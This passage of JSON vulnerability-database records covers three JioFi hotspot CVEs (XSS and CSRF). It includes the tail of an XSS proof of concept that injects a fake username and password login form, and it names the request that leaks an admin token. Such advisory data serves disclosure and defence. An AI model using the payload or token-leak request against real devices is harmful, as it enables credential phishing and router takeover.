name=\"username\"/\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003ePassword:\u003c/td\u003e\u003ctd\u003e\u003cinput type=\"text\" name=\"password\"/\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd colspan=2 align=center\u003e\u003cinput type=\"submit\" value=\"Login\"/\u003e\u003c/td\u003e\u003c/tr\u003e\u003c/table\u003e\u003c/form\u003e\u003c/div\u003e\",\"wan_status\":\"On\",\"total_data_used\":\"10005648\",\"wan_operation_mode\":\"NAT\",\"wan_connection_mode\":\"DHCP\",\"wan_mac\":\"40:C8:CB:07:2C:8A\",\"host_name\":\"JMR1140-072C8A\",\"multi_pdn\":\"Disabled\",\"ipv4_addr\":\"10.153.220.101\",\"ipv4_subnet\":\"255.255.255.252\",\"ipv4_gateway\":\"10.153.220.102\",\"ipv4_primary\":\"49.45.0.1\",\"ipv4_secondary\":\"0.0.0.0\",\"ipv6_addr\":\"2409:4060:218e:b511:89ec:3214:def1:f75b\",\"ipv6_subnet\":\"64\",\"ipv6_gateway\":\"fe80::c9b3:928a:5eca:7e1c\",\"ipv6_primary\":\"2405:200:800::1\",\"ipv6_secondary\":\"::\",\"channel\":\"automatic\",\"packet_loss\":\"0 / 0\",\"total_data_used_dlink\":\"5.11 MB\",\"total_data_used_ulink\":\"4.37 MB\"}\n\n---------------------------------------------------------------------------------------------------------------\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7438"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003215"
},
{
"db": "VULHUB",
"id": "VHN-158873"
},
{
"db": "PACKETSTORM",
"id": "152625"
}
],
"trust": 1.8
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-158873",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158873"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "PACKETSTORM",
"id": "152625",
"trust": 2.6
},
{
"db": "NVD",
"id": "CVE-2019-7438",
"trust": 2.6
},
{
"db": "EXPLOIT-DB",
"id": "46751",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003215",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201903-795",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-158873",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158873"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003215"
},
{
"db": "PACKETSTORM",
"id": "152625"
},
{
"db": "NVD",
"id": "CVE-2019-7438"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-795"
}
]
},
"id": "VAR-201903-0478",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-158873"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:02:20.380000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "JioFi M2",
"trust": 0.8,
"url": "https://www.jio.com/shop/en-in/jiofi-m2/p/491193575"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003215"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158873"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003215"
},
{
"db": "NVD",
"id": "CVE-2019-7438"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/152625/jiofi-4g-m2s-1.0.2-cross-site-scripting.html"
},
{
"trust": 1.7,
"url": "https://www.exploit-db.com/exploits/46751/"
},
{
"trust": 1.7,
"url": "https://gkaim.com/cve-2019-7438-html-vikas-chaudhary/"
},
{
"trust": 1.7,
"url": "https://gkaim.com/cve-2019-7438-xss-vikas-chaudhary/"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7438"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7438"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/46751"
},
{
"trust": 0.1,
"url": "https://gkaim.com/"
},
{
"trust": 0.1,
"url": "http://anysite.com/\"\u003e\u003ctable\u003e\u003ctr\u003e\u003ctd\u003eusername:\u003c/td\u003e\u003ctd\u003e\u003cinput"
},
{
"trust": 0.1,
"url": "http://192.168.225.1/"
},
{
"trust": 0.1,
"url": "https://www.facebook.com/profile.php?id=100011287630308"
},
{
"trust": 0.1,
"url": "http://192.168.225.1/cgi-bin/qcmap_web_cgi"
},
{
"trust": 0.1,
"url": "https://www.jio.com/"
},
{
"trust": 0.1,
"url": "http://192.168.225.1"
},
{
"trust": 0.1,
"url": "https://www.amazon.in/jiofi-hotspot-m2s-portable-device/dp/b075p7blv5/ref=sr_1_1?s=computers\u0026ie=utf8\u0026qid=1531032476\u0026sr=1-1\u0026keywords=jiofi+m2s+wireless+data+card++%28black%29"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158873"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003215"
},
{
"db": "PACKETSTORM",
"id": "152625"
},
{
"db": "NVD",
"id": "CVE-2019-7438"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-795"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-158873"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003215"
},
{
"db": "PACKETSTORM",
"id": "152625"
},
{
"db": "NVD",
"id": "CVE-2019-7438"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-795"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-03-21T00:00:00",
"db": "VULHUB",
"id": "VHN-158873"
},
{
"date": "2019-05-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-003215"
},
{
"date": "2019-04-25T15:58:13",
"db": "PACKETSTORM",
"id": "152625"
},
{
"date": "2019-03-21T16:01:13.797000",
"db": "NVD",
"id": "CVE-2019-7438"
},
{
"date": "2019-03-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-795"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-04-26T00:00:00",
"db": "VULHUB",
"id": "VHN-158873"
},
{
"date": "2019-05-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-003215"
},
{
"date": "2019-04-26T14:24:29.310000",
"db": "NVD",
"id": "CVE-2019-7438"
},
{
"date": "2019-04-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-795"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-795"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "JioFi 4G M2S Cross-site scripting vulnerability in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003215"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "152625"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-795"
}
],
"trust": 0.7
}
}
VAR-201905-0421
Vulnerability from variot - Updated: 2023-12-18 12:56JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain an admin token by making a /cgi-bin/qcmap_auth type=getuser request and then reading the token field. This token value can then be used to change the Wi-Fi password or perform a factory reset. JioFi 4 jmr1140 The device contains a cross-site request forgery vulnerability.Information may be obtained and information may be altered. Reliance Jio Infocomm JioFi 4 jmr1140 is a portable wireless router device from Reliance Jio Infocomm in Australia. The vulnerability stems from the WEB application not adequately verifying that the request is from a trusted user. An attacker could exploit this vulnerability to send unexpected requests to the server through an affected client
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201905-0421",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "jmr1140",
"scope": "eq",
"trust": 1.0,
"vendor": "jio",
"version": "amtel_jmr1140_r12.07"
},
{
"model": "jiofi jmr1140",
"scope": "eq",
"trust": 0.8,
"vendor": "reliance jio infocomm",
"version": "amtel_jmr1140_r12.07"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-004437"
},
{
"db": "NVD",
"id": "CVE-2019-7746"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:jio:jmr1140_firmware:amtel_jmr1140_r12.07:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:jio:jmr1140:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7746"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Ronnie T Baby",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201902-624"
}
],
"trust": 0.6
},
"cve": "CVE-2019-7746",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2019-7746",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-159181",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.2,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 8.1,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-7746",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-7746",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201902-624",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-159181",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-159181"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004437"
},
{
"db": "NVD",
"id": "CVE-2019-7746"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-624"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain an admin token by making a /cgi-bin/qcmap_auth type=getuser request and then reading the token field. This token value can then be used to change the Wi-Fi password or perform a factory reset. JioFi 4 jmr1140 The device contains a cross-site request forgery vulnerability.Information may be obtained and information may be altered. Reliance Jio Infocomm JioFi 4 jmr1140 is a portable wireless router device from Reliance Jio Infocomm in Australia. The vulnerability stems from the WEB application not adequately verifying that the request is from a trusted user. An attacker could exploit this vulnerability to send unexpected requests to the server through an affected client",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7746"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004437"
},
{
"db": "VULHUB",
"id": "VHN-159181"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7746",
"trust": 2.5
},
{
"db": "PACKETSTORM",
"id": "151656",
"trust": 1.7
},
{
"db": "EXPLOIT-DB",
"id": "46365",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004437",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201902-624",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-159181",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-159181"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004437"
},
{
"db": "NVD",
"id": "CVE-2019-7746"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-624"
}
]
},
"id": "VAR-201905-0421",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-159181"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:56:33.235000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.jio.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-004437"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-159181"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004437"
},
{
"db": "NVD",
"id": "CVE-2019-7746"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "http://packetstormsecurity.com/files/151656/jiofi-4-jmr-1140-admin-token-disclosure-cross-site-request-forgery.html"
},
{
"trust": 1.7,
"url": "https://www.exploit-db.com/exploits/46365/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7746"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7746"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/46365"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-159181"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004437"
},
{
"db": "NVD",
"id": "CVE-2019-7746"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-624"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-159181"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004437"
},
{
"db": "NVD",
"id": "CVE-2019-7746"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-624"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-05-07T00:00:00",
"db": "VULHUB",
"id": "VHN-159181"
},
{
"date": "2019-06-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-004437"
},
{
"date": "2019-05-07T19:29:02.190000",
"db": "NVD",
"id": "CVE-2019-7746"
},
{
"date": "2019-02-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201902-624"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-05-08T00:00:00",
"db": "VULHUB",
"id": "VHN-159181"
},
{
"date": "2019-06-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-004437"
},
{
"date": "2019-05-08T18:05:34.450000",
"db": "NVD",
"id": "CVE-2019-7746"
},
{
"date": "2019-05-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201902-624"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201902-624"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "JioFi 4 jmr1140 Device cross-site request forgery vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-004437"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201902-624"
}
],
"trust": 0.6
}
}
VAR-201903-0480
Vulnerability from variot - Updated: 2023-12-18 12:36JioFi 4G M2S 1.0.2 devices have CSRF via the SSID name and Security Key field under Edit Wi-Fi Settings (aka a SetWiFi_Setting request to cgi-bin/qcmap_web_cgi). JioFi 4G M2S The device contains a cross-site request forgery vulnerability.Information may be tampered with. A remote attacker could use the SSID name and Security Key fields to exploit this vulnerability to perform operations with administrative privileges
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201903-0480",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "jiofi 4g m2s",
"scope": "eq",
"trust": 1.0,
"vendor": "jio",
"version": "1.0.2"
},
{
"model": "jiofi m2s",
"scope": "eq",
"trust": 0.8,
"vendor": "reliance jio infocomm",
"version": "1.0.2"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002846"
},
{
"db": "NVD",
"id": "CVE-2019-7440"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:jio:jiofi_4g_m2s_firmware:1.0.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:jio:jiofi_4g_m2s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7440"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vikas Chaudhary",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-797"
}
],
"trust": 0.6
},
"cve": "CVE-2019-7440",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2019-7440",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-158875",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
